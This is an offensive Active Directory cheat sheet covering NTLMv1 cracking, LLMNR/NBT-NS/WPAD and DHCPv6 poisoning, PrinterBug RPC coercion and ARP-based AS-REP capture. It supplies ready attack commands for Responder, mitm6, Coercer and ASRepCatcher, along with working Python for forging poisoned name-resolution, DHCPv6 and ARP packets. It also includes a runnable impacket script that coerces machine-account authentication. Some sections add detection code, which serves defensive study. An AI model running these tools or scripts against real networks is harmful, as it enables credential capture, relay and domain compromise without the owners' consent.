Protocol Poisoning and Coercion

Net-NTLMv1

An important caveat to the following attacks is what you can do with a captured Net-NTLM response. A Net-NTLMv2 response cannot be turned back into the user's NT hash; it can only be brute-forced against a wordlist (hashcat mode 5600), although it can be relayed in most scenarios where signing is not enforced. A Net-NTLMv1 response, by contrast, is just three DES encryptions of the 8-byte server challenge under keys taken straight from the NT hash. Because Responder issues a fixed challenge (1122334455667788), the response can be cracked with DES rainbow tables or brute force to recover the NT hash itself, which can then be passed for SMB or other service authentication or used to request Kerberos tickets (overpass-the-hash). Responder's --lm and --disable-ess options push clients that still permit Net-NTLMv1 into the weakest response form.
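
To make the caveat concrete, the following added Python example (not code from the original page) shows the DES structure that makes a Net-NTLMv1 response crackable: how an NT hash becomes three DES keys, how to turn a Responder-style capture line into hashcat -m 14000 inputs (including the Extended Session Security case, where the effective DES input is the first 8 bytes of MD5(server challenge || client challenge) rather than the fixed challenge), and how to rebuild the NT hash from the three recovered DES keys. The capture lines and the NT hash used below are constructed, not real captures.

```python
import hashlib

RESPONDER_FIXED_CHALLENGE = "1122334455667788"  # Responder's default fixed server challenge


def des_key_7to8(key7: bytes) -> bytes:
    """Expand a 7-byte (56-bit) key into the 8-byte form DES tools expect.
    Each output byte carries 7 key bits plus a trailing odd-parity bit."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        byte = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(byte).count("1") % 2 == 0:
            byte |= 1  # set the parity bit so the byte has odd parity
        out.append(byte)
    return bytes(out)


def des_key_8to7(key8: bytes) -> bytes:
    """Inverse of des_key_7to8: drop the parity bits of a recovered DES key."""
    bits = 0
    for byte in key8:
        bits = (bits << 7) | (byte >> 1)
    return bits.to_bytes(7, "big")


def nt_hash_to_des_keys(nt_hash: bytes) -> list:
    """NTLMv1 pads the 16-byte NT hash with 5 zero bytes and splits it into
    three 7-byte DES keys; the response is DES_K1(C) || DES_K2(C) || DES_K3(C)."""
    padded = nt_hash + bytes(5)
    return [des_key_7to8(padded[i:i + 7]) for i in (0, 7, 14)]


def nt_hash_from_des_keys(keys: list) -> bytes:
    """Reassemble the NT hash from the three cracked DES keys. K3 holds only the
    last two hash bytes plus zero padding, so its keyspace is 2^16."""
    return b"".join(des_key_8to7(k) for k in keys)[:16]


def ess_in_use(lm_response_hex: str) -> bool:
    """With NTLMv1 Extended Session Security the LM response field carries the
    8-byte client challenge followed by 16 zero bytes."""
    return lm_response_hex[16:] == "0" * 32 and lm_response_hex[:16] != "0" * 16


def ess_challenge(server_challenge_hex: str, client_challenge_hex: str) -> str:
    """Effective DES plaintext under ESS: first 8 bytes of MD5(server || client)."""
    data = bytes.fromhex(server_challenge_hex) + bytes.fromhex(client_challenge_hex)
    return hashlib.md5(data).digest()[:8].hex()


def ntlmv1_to_hashcat14000(capture_line: str) -> list:
    """Convert a Responder-style 'user::DOMAIN:LM:NT:challenge' line into three
    hashcat -m 14000 entries of the form 'ciphertext:plaintext'."""
    user, _, domain, lm_hex, nt_hex, challenge_hex = capture_line.strip().split(":")
    if len(nt_hex) != 48 or len(challenge_hex) != 16:
        raise ValueError("expected a 24-byte NT response and an 8-byte challenge")
    if ess_in_use(lm_hex):
        # Fixed-challenge rainbow tables do not apply here: the DES input is per-session.
        challenge_hex = ess_challenge(challenge_hex, lm_hex[:16])
    return [f"{nt_hex[i:i + 16]}:{challenge_hex}" for i in (0, 16, 32)]


if __name__ == "__main__":
    # Constructed capture line, not a real one: ESS disabled, fixed challenge in use.
    line = ("jdoe::CONTOSO:" + "00" * 24 + ":" + "aa" * 8 + "bb" * 8 + "cc" * 8
            + ":" + RESPONDER_FIXED_CHALLENGE)
    for entry in ntlmv1_to_hashcat14000(line):
        print(entry)
```

K3 carries only the last two bytes of the hash, so it falls to a 65,536-candidate brute force; K1 and K2 are full 56-bit DES keys, which is where the fixed challenge matters: precomputed tables for 1122334455667788 exist (services such as crack.sh), but as soon as ESS is in use the DES input is per-session and each block is a full DES search again. That is what Responder's --disable-ess option is for.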

Protocol Poisoning

"Protocol poisoning" is a general term for maliciously answering name-resolution and auto-configuration requests (LLMNR, NBT-NS, mDNS, WPAD, DHCPv6) so that hosts on the local segment send their traffic, and the authentication that accompanies it, to an attacker-controlled host, where it is captured or relayed onwards.

LLMNR and NBT-NS name resolution, and the WPAD proxy discovery that relies on them, are enabled by default in most Active Directory environments and are all susceptible to poisoning. Responder does the heavy lifting for these protocols: start it on the right interface and it answers the requests, collecting Net-NTLM responses, or, with its own SMB and HTTP servers turned off, leaving the connections for a relay tool such as ntlmrelayx.

Responder

responder -I eth0
responder -I eth0 -wF # -w starts the rogue WPAD proxy server; -F forces NTLM/Basic authentication on the wpad.dat request (may show the victim a login prompt)
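
What Responder is doing for LLMNR, shown in an added Python example that is not part of the original page or of Responder: LLMNR reuses the DNS message format over UDP 5355 (multicast 224.0.0.252), so a poisoner that receives a query for a name nobody owns simply answers it with an A record for its own address. The name, transaction ID, attacker address and 30-second TTL are constructed values; nothing here touches the network, but the bytes are what a socket would send and receive. The last function is the check a defender's canary probe uses: a query for a name that must not resolve should never get an answer.

```python
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"  # IPv4 multicast group for LLMNR
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"


def decode_name(data: bytes, offset: int):
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode())
        offset += length


def build_query(name: str, txid: int = None) -> bytes:
    """An LLMNR query as a Windows host sends it for an unresolved single-label name."""
    txid = random.getrandbits(16) if txid is None else txid
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)  # flags 0, QDCOUNT 1
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def parse_query(packet: bytes) -> dict:
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", packet[:12])
    name, offset = decode_name(packet, 12)
    qtype, qclass = struct.unpack(">HH", packet[offset:offset + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's reply: same transaction ID, QR bit set, the original
    question echoed, and one A record pointing the name at the attacker."""
    q = parse_query(query)
    header = struct.pack(">HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack(">HH", q["qtype"], q["qclass"])
    rdata = socket.inet_aton(attacker_ip)
    answer = encode_name(q["name"]) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(packet: bytes) -> dict:
    txid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", packet[:12])
    offset = 12
    for _ in range(qdcount):
        _, offset = decode_name(packet, offset)
        offset += 4  # skip QTYPE and QCLASS
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(packet, offset)
        rtype, rclass, ttl, rdlength = struct.unpack(">HHIH", packet[offset:offset + 10])
        offset += 10
        rdata = packet[offset:offset + rdlength]
        offset += rdlength
        if rtype == QTYPE_A:
            answers.append((name, socket.inet_ntoa(rdata)))
    return {"txid": txid, "is_response": bool(flags & 0x8000), "answers": answers}


def canary_answered(probe_query: bytes, packet: bytes) -> bool:
    """Defender-side check: True if `packet` answers our probe for a name that
    should not exist anywhere, which is exactly what a poisoner does."""
    q, r = parse_query(probe_query), parse_response(packet)
    return r["is_response"] and r["txid"] == q["txid"] and any(
        name.lower() == q["name"].lower() for name, _ in r["answers"])


if __name__ == "__main__":
    # Constructed exchange: a mistyped share name answered with an attacker IP.
    query = build_query("fileshar", txid=0x1234)
    reply = build_poisoned_response(query, "10.10.14.5")
    print(parse_response(reply))
```

Sent to LLMNR_GROUP:LLMNR_PORT, these are the bytes a victim receives; Responder additionally answers NBT-NS and mDNS and then runs the SMB and HTTP endpoints the victim connects to. Defensively, sending build_query for a random name every few minutes and feeding any reply to canary_answered is the classic LLMNR-poisoning detector.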

Windows hosts also request IPv6 configuration over DHCPv6 by default, even on networks that only run IPv4, and DHCPv6 has no built-in authentication. Answering those Solicit requests with your own host as the DNS server (mitm6 does exactly this, and then answers the victims' DNS queries, WPAD lookups included, with your address) redirects a large amount of traffic towards a controlled host. Be warned that excessive use may cause outages if IPv6 is genuinely in use throughout the organization.

IPv6 DHCP

mitm6 --ignore-nofqdn -d contoso.com -i eth0 # --ignore-nofqdn skips clients whose Solicit carries no hostname
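
The mitm6 exchange in miniature, as an added Python example (not from the original page or from mitm6): a DHCPv6 Advertise carries its settings as type-length-value options, and the one that matters is option 23 (DNS recursive name servers), with option 24 (domain search list) steering lookups for the organisation's names to the poisoned server. The rogue server address, client and server DUIDs, transaction ID and domain are constructed. The final function is the defender's view: an Advertise or Reply naming a DNS server outside the approved set, and in particular one at a link-local fe80:: address (where a rogue host on the same segment naturally answers from) on a network that runs no IPv6, is a strong indicator of DHCPv6 poisoning.

```python
import ipaddress
import struct

SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 23, 24


def option(code: int, data: bytes) -> bytes:
    """DHCPv6 option: 2-byte code, 2-byte length, data."""
    return struct.pack(">HH", code, len(data)) + data


def encode_domain_list(domains) -> bytes:
    out = b""
    for domain in domains:
        out += b"".join(bytes([len(l)]) + l.encode() for l in domain.split(".")) + b"\x00"
    return out


def decode_domain_list(data: bytes) -> list:
    domains, offset = [], 0
    while offset < len(data):
        labels = []
        while data[offset] != 0:
            length = data[offset]
            labels.append(data[offset + 1:offset + 1 + length].decode())
            offset += 1 + length
        offset += 1
        domains.append(".".join(labels))
    return domains


def build_rogue_advertise(txid: int, client_duid: bytes, server_duid: bytes,
                          dns_server: str, domains) -> bytes:
    """What a poisoner answers a Solicit with: its own address as the DNS server,
    plus the victim's domain so lookups for it are routed through the poisoner."""
    body = struct.pack(">I", txid)[1:]  # transaction-id is 3 bytes
    body += option(OPT_CLIENTID, client_duid)
    body += option(OPT_SERVERID, server_duid)
    body += option(OPT_DNS_SERVERS, ipaddress.IPv6Address(dns_server).packed)
    body += option(OPT_DOMAIN_LIST, encode_domain_list(domains))
    return bytes([ADVERTISE]) + body


def parse_dhcpv6(packet: bytes) -> dict:
    msg_type = packet[0]
    txid = int.from_bytes(packet[1:4], "big")
    options, offset = {}, 4
    while offset + 4 <= len(packet):
        code, length = struct.unpack(">HH", packet[offset:offset + 4])
        data = packet[offset + 4:offset + 4 + length]
        offset += 4 + length
        if code == OPT_DNS_SERVERS:
            options["dns_servers"] = [str(ipaddress.IPv6Address(data[i:i + 16]))
                                      for i in range(0, len(data), 16)]
        elif code == OPT_DOMAIN_LIST:
            options["domain_list"] = decode_domain_list(data)
        else:
            options[code] = data
    return {"msg_type": msg_type, "txid": txid, **options}


def rogue_dns_indicators(packet: bytes, approved_dns_servers) -> list:
    """Defender check over an Advertise/Reply: report DNS servers not in the
    approved set, calling out link-local ones separately."""
    parsed = parse_dhcpv6(packet)
    if parsed["msg_type"] not in (ADVERTISE, REPLY):
        return []
    approved = {ipaddress.IPv6Address(a) for a in approved_dns_servers}
    findings = []
    for server in parsed.get("dns_servers", []):
        addr = ipaddress.IPv6Address(server)
        if addr in approved:
            continue
        kind = "link-local" if addr.is_link_local else "unapproved"
        findings.append(f"{kind} DNS server {addr} offered in DHCPv6 message type {parsed['msg_type']}")
    return findings


if __name__ == "__main__":
    # Constructed packet, not a capture: the rogue host answers from its link-local address.
    pkt = build_rogue_advertise(0xABCDEF, b"\x00\x01" * 7, b"\x00\x02" * 5, "fe80::1337", ["contoso.com"])
    for finding in rogue_dns_indicators(pkt, approved_dns_servers=[]):
        print(finding)
```

approved_dns_servers should hold the resolvers your real DHCPv6 infrastructure advertises; on a network that deliberately runs no IPv6 it is an empty list, and any Advertise at all is worth an alert.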

Authentication Coercion

Authentication does not have to be intercepted; it can be coerced by a variety of means. SSRF, and file-path or upload handlers that accept UNC paths, can make a Windows server authenticate to your host over SMB or HTTP. Printers and similar appliances that store SMTP or LDAP credentials can often be re-pointed at a listener you control, which then receives those credentials in cleartext. Get creative.

You can also use RPC to invoke functions on servers that make them authenticate outbound (MS-RPRN, MS-EFSR and others). Coercer automates most of this, letting you coerce either SMB- or HTTP-based authentication.

RPC Coercion - SMB/HTTP

Coercer scan -t 10.10.10.10 -u user -p pass -d contoso.com

Targets running the WebClient (WebDAV) service can be coerced into HTTP-based authentication, which is what you need when relaying to LDAP or LDAPS, since SMB authentication cannot be relayed there. Give the listener as a UNC path of the form \\NAME@PORT\ using a dotless NetBIOS-style name rather than an IP: WebClient turns that form into an HTTP request but only authenticates automatically to intranet-zone (dotless) names, and the name must resolve, for example through a DNS record you add or through LLMNR poisoning.

Coercer coerce -t 10.10.10.10 -l \\WKSTN-1@80\ -u user -p pass -d contoso.com
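
One of the RPC calls Coercer automates, done by hand with impacket's MS-RPRN bindings as an added Python example (not Coercer's code): RpcRemoteFindFirstPrinterChangeNotificationEx (the "PrinterBug") asks the target's Print Spooler to send change notifications to pszLocalMachine, and the spooler, running as SYSTEM, authenticates to that path as the machine account. The listener_unc helper encodes the point above: a plain host yields an SMB connection, and the host@port form is handed to the WebClient service and becomes HTTP, but only for a dotless intranet-zone name, so the helper refuses dotted names and IPs in that form. Target, credentials and listener names are placeholders; the RPC function assumes the Print Spooler is running on the target and that impacket is installed (it is imported lazily so the helper works without it).

```python
import argparse


def is_intranet_zone_name(host: str) -> bool:
    """Windows treats a dotless name as Intranet zone, the only zone WebClient
    authenticates to automatically. IPs and FQDNs do not qualify."""
    return bool(host) and "." not in host and ":" not in host


def listener_unc(host: str, webdav_port: int = None) -> str:
    """Build the UNC path handed to the coerced server.
    \\\\HOST\\      -> the target connects over SMB (port 445)
    \\\\HOST@PORT\\ -> the target's WebClient service connects over HTTP/WebDAV"""
    if webdav_port is None:
        return f"\\\\{host}\\"
    if not is_intranet_zone_name(host):
        raise ValueError("WebDAV coercion needs a dotless NetBIOS-style listener name")
    if not 1 <= webdav_port <= 65535:
        raise ValueError("invalid port")
    return f"\\\\{host}@{webdav_port}\\"


def coerce_via_spoolss(target: str, listener: str, username: str, password: str, domain: str) -> None:
    """MS-RPRN RpcRemoteFindFirstPrinterChangeNotificationEx over \\pipe\\spoolss."""
    from impacket.dcerpc.v5 import rprn, transport
    from impacket.dcerpc.v5.dtypes import NULL

    binding = rf"ncacn_np:{target}[\pipe\spoolss]"
    rpc = transport.DCERPCTransportFactory(binding)
    rpc.set_credentials(username, password, domain)
    dce = rpc.get_dce_rpc()
    dce.connect()
    dce.bind(rprn.MSRPC_UUID_RPRN)

    handle = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")["pHandle"]
    request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
    request["hPrinter"] = handle
    request["fdwFlags"] = rprn.PRINTER_CHANGE_ADD_JOB
    # The spooler connects to this machine name to deliver notifications, authenticating on the way.
    request["pszLocalMachine"] = listener.rstrip("\\") + "\x00"
    request["pOptions"] = NULL
    try:
        dce.request(request)
    except Exception as exc:  # an RPC error is expected once the spooler has connected out
        print(f"[*] spooler responded: {exc}")
    dce.disconnect()


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="coerce SMB or WebDAV authentication via MS-RPRN (added example)")
    ap.add_argument("-t", "--target", required=True)
    ap.add_argument("-l", "--listener", required=True, help="listener host; dotless name if --webdav-port is set")
    ap.add_argument("--webdav-port", type=int, default=None)
    ap.add_argument("-u", "--username", required=True)
    ap.add_argument("-p", "--password", required=True)
    ap.add_argument("-d", "--domain", default="")
    args = ap.parse_args()
    coerce_via_spoolss(args.target, listener_unc(args.listener, args.webdav_port),
                       args.username, args.password, args.domain)
```

Run it with -l 10.10.14.5 for SMB, or -l WKSTN-1 --webdav-port 80 for WebDAV with ntlmrelayx listening on port 80; the RPC call usually returns an error after the spooler has already connected to the listener, which is the expected outcome.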

ASREP ARP Relay

This technique ARP-spoofs the domain controller's address towards clients so that their Kerberos exchanges pass through your host. When a user logs on, the AS-REP the DC returns carries an encrypted part keyed to that user's password-derived key; ASRepCatcher captures it and writes it out in a crackable format for offline cracking. Unlike AS-REP roasting this works for any user, not only accounts with pre-authentication disabled.

ASRepCatcher relay -dc 192.168.1.100
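
The first hop of the technique, ARP-spoofing the domain controller, in an added Python example that is not part of the original page or of ASRepCatcher: a spoofed ARP reply claims the DC's IP with the attacker's MAC so that the victim's AS-REQ, and the AS-REP it triggers, are delivered to the attacker. Building the frame shows exactly what goes on the wire; the ArpWatch class is the matching detection, keyed on a static table of bindings that must never move (domain controllers first). All MAC and IP addresses below are constructed.

```python
import socket
import struct

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP reply 'sender_ip is at sender_mac'.
    A poisoner puts the DC's IP in sender_ip and its own MAC in sender_mac."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack(">H", ETH_TYPE_ARP)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, hlen 6, plen 4, reply
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return ethernet + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack(">H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    _, _, _, _, opcode = struct.unpack(">HHBBH", frame[14:22])
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


class ArpWatch:
    """Detect ARP spoofing of hosts whose IP-to-MAC binding must never change."""

    def __init__(self, protected: dict):
        # {ip: mac} for domain controllers, gateways and other critical hosts
        self.protected = {ip: mac.lower() for ip, mac in protected.items()}

    def observe(self, frame: bytes):
        """Return an alert string for a frame that claims a protected IP with
        the wrong MAC, else None."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        expected = self.protected.get(arp["sender_ip"])
        if expected is None or arp["sender_mac"] == expected:
            return None
        return (f"ARP spoof: {arp['sender_ip']} claimed by {arp['sender_mac']} "
                f"(expected {expected}), sent to {arp['target_ip']}")


if __name__ == "__main__":
    # Constructed addresses: DC at 192.168.1.100, a client at .50, and the attacker's MAC.
    watch = ArpWatch({"192.168.1.100": "00:50:56:aa:bb:cc"})
    legit = build_arp_reply("00:50:56:aa:bb:cc", "192.168.1.100", "00:50:56:11:22:33", "192.168.1.50")
    spoofed = build_arp_reply("00:0c:29:de:ad:01", "192.168.1.100", "00:50:56:11:22:33", "192.168.1.50")
    for frame in (legit, spoofed):
        print(watch.observe(frame))
```

In an estate where DC addresses are static, the protected table can be seeded from DNS and the DC's own MAC as learned from a trusted position; arpwatch-style tools do the same at scale, and dynamic ARP inspection on the switch stops the frames before any host caches them.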
